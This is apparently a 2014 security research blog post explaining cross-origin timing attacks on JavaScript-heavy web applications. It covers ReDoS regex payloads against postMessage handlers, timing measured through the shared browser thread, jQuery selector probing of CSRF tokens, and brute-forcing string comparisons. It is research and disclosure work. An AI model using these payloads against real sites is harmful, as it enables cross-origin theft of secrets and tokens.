Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about wrapping overflow leak on frames, this one is also regarding the presentation Matryoshka that I gave in Hamburg during HackPra All Stars 2013 during Appsec Europe 2013.

The subject today is regarding web application timing attacks. The idea behind this attack is a couple of techniques on how to attack another website by using timing attacks. Timing attacks are very popular in cryptography, and usually focus on either remote services, or local applications. Recently, they've become a bit popular, and are being used to attack browser security features.


Today the subject I want to discuss is not attacking the browser, or the operating system, but rather, other websites. In specific, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.


The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript heavy applications that handle data somehow controlled by another website, such as cookies, the URL, referrer, postMessage, etc..


Overall though, the attack itself isn't new, and the application of the attack on browsers is probably predictable.. but when discussed it's frequently dismissed as unexploitable, or unrealistic. Now, before I get your hopes up, while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.


We know that you can obviously know if your own code runs faster or slower, but, as some of you might want to correct me.. that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that https://puppies.com cant interact with https://kittens.com. It defines a very specific subset of APIs where communication is safe (like, say, navigation, or postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks, you need to opt-in to be vulnerable to them. That is, you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        e.source.postMessage('got a match!', e.source);
    }
}

Well, of course it will be possible to leak information.. try it out here:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9
Regexp:


You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
    e.source.postMessage('finished', e.source);
}

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability (or.. not).

Now, it clearly is vulnerable, but let's figure out exactly why. There is one piece of information that is leaked, and that is, how long it took to run the regular expression. We control the regular expression, so we get to run any regular expression and we will get to learn how long it took to run.

If you are familiar with regular expressions, you might be familiar with the term "ReDoS", which is a family of regular expressions that perform a Denial of Service attack on the runtime because they run in exponential time. You can read more about it here. Well, the general premise is that you can make a regular expression take for-ever if you want to.

So, with that information, we can do the same attack as before, but this time, we will infer if we had the right match simply by checking if it took over N seconds to respond to our message, or well... if it returned immediately.

Let's give it a try:


  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX
Regexp:



Did you notice that the right answer took longer than the others?

If you are an average security curmudgeon you will still say that the fault is at the vulnerable site, since it's opting-in to leak how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
}

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates kittens.com from puppies.com I wasn't being totally honest. The JavaScript code from both, kittens.com and puppies.com run in the same thread. That is, if you have 3 iframes one pointing to puppies.com, one pointing to kittens.com and one pointing to snakes.com then all of them run in the same thread.

Said in another way, if snakes.com suddenly decides to run into an infinite loop, neither puppies.com nor kittens.com will be able to run in any JavaScript code. Don't believe me? Give it a try!




.

Did you notice that when you looped the "snakes" the counters in the other two iframes stopped? That's because both, the snakes and the puppies and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens upon us. Now, we don't need the other page surrender any information to us. Simply by running in the same thread we do, we can guess how long their code takes to run!

One way to attack this is by simply asking the browser to run a specific piece of code every millisecond, and whenever we don't run, that means there's some other code keeping the interpreter busy at the time. We keep track of these delays and we then learn how long the code took to run.

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content.. so this attack is kinda lame..

Well, not really. Fortunately there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me that he always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS, but then jQuery fixed it.. so no-more-XSS and if the code starts with a '#', then it is forced as a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it took for it to run a specific selector over the code. I told him that was a great idea, and started looking into it. Turns out, there is a "contains" selector in jQuery that will essentially look at all the text content in the page and try to figure out what nodes "contain" such text.

It essentially finds a node, and then serializes it's text contents, and then searches for such value inside it. In a nutshell it does:

haystack.indexOf(needle);

Which, is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out if there was a match is significantly more complicated.. We need to know if the "haystack" found something (or not) which sounds, well.. complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a running time difference, but the difference is so small we might not be able to measure it.

There is another, even cooler selector, the "string prefix" selector. Say, you have:

You can match it with:
input[name=csrftoken][value^=X]

But again, this is even more difficult than the indexOf() attack we were doing earlier.. The question now is can we detect string comparisons? Can we get enough accuracy out of performance.now() that we get to know if string comparisons succeed?

To make the question clearer.. can we measure in JavaScript the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right" because the runtime can stop the comparison on the first character, while to be sure that "right" is equal to "right", then it needs to compare every character in the string to ensure it's exactly the same.

This should be easy to test. In the following iframe we make a quick experiment and measure:

  • Time taken to compare "aaaa.....a" (200k) to "foobar"
  • Time taken to compare "aaaa.....a" to "aaaa.....a"
We make the comparison 100 times to make the timing difference more explicit.

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
This strangely looking results mean, mostly, that comparing a very long string takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is first, they try to take a shortcut. If the lengths are different, then they return false immediately. If they are the same, on the other hand, then they compare char-by-char. As soon as they find a character that doesn't match, it returns false.

But is it significant? And if so, how significant is it? To try and answer that question I ran several experiments. For instance, it's 2-10 times faster to make a "false" comparison, than a "true" comparison with just 18 characters. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need to be able to "stabilize" the comparison. What you should see in that graph is something like:

What that graph means is that after 120,000 iterations (that is 120,000 comparisons) the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx"  is stable and is 6 times slower. And, to be clear, that is 18 characters being different. This means that to be able to notice the 6X difference you would need to bruteforce the 18 characters at once. Even in the most optimistic scenarios, bruteforcing 18 characters is way out the question.

If you try to repeat the experiment with just 2 characters, the results are significantly different (note this graph rounds up results to the closest integer). You won't be able to notice any difference.. at all. The line is flat up to a million iterations. That means that comparing a million times "aa" vs "bb" runs in about the same amount of time (not as impressive as our 6X!).

But.. we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters the difference looks roughly like this:
Which.. means it usually runs in exactly the same time, sometimes a tiny bit faster, but also many times slightly slower. In essence, it seems to run at about 1.02 times the speed of a false comparison.

Now, the fact this graph looks so messy means our exploit won't be as reliable, and will require significantly more samples to detect any changes. We now have in our hands a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred or a couple thousand, or a couple million times (this actually depends on the machine, a slow machine has more measurable results, but also has more noise, a fast machine has less measurable results, but we can do more accurate measurements).

With the samples we either average the results, or get the mean of means (which needs a lot of samples) or a chi squared test if we knew the variance or a student t test if you can assume a normal distribution (JavaScript's garbarge collector skews things a bit).


At the end of the day, I ended up creating my own test, and was able to brute force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing
}

Here are some results on string comparison on Chrome:
  • It is possible to bruteforce an 18 digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform 5 quadrillion comparisons per second. With the timing attack you only need 1 million.
  • It is possible to reliably calculate a 9 character alphanumeric string in about 10 minutes.
    • This is different than the numbers because here we have 37 characters alphabet, and with numbers it's just 10.
If you are interested in playing around with it, and you have patience (a lot of patience!) check this and this. They will literally take 5-10 minutes to run, and it will simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience you can run this which will run different combinations of iterations/samples trying to figure out which works best (slow machines work better with less iterations and more samples, faster machines run best with more iterations and less samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadness. That might change with things like process isolation, but it will continue to be possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for a 18 digit number you are my hero!), find a problem in the sampling/data, or otherwise are able to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing is that strings from different origins are both stored in the same hash table. This means that if we were able to measure a hashtable miss from a hashtable match, we could read strings cross-origin.

I spent a lot of time trying to make that to work, but it didn't work out. If you can do it, let me know as well :)

Thanks for reading!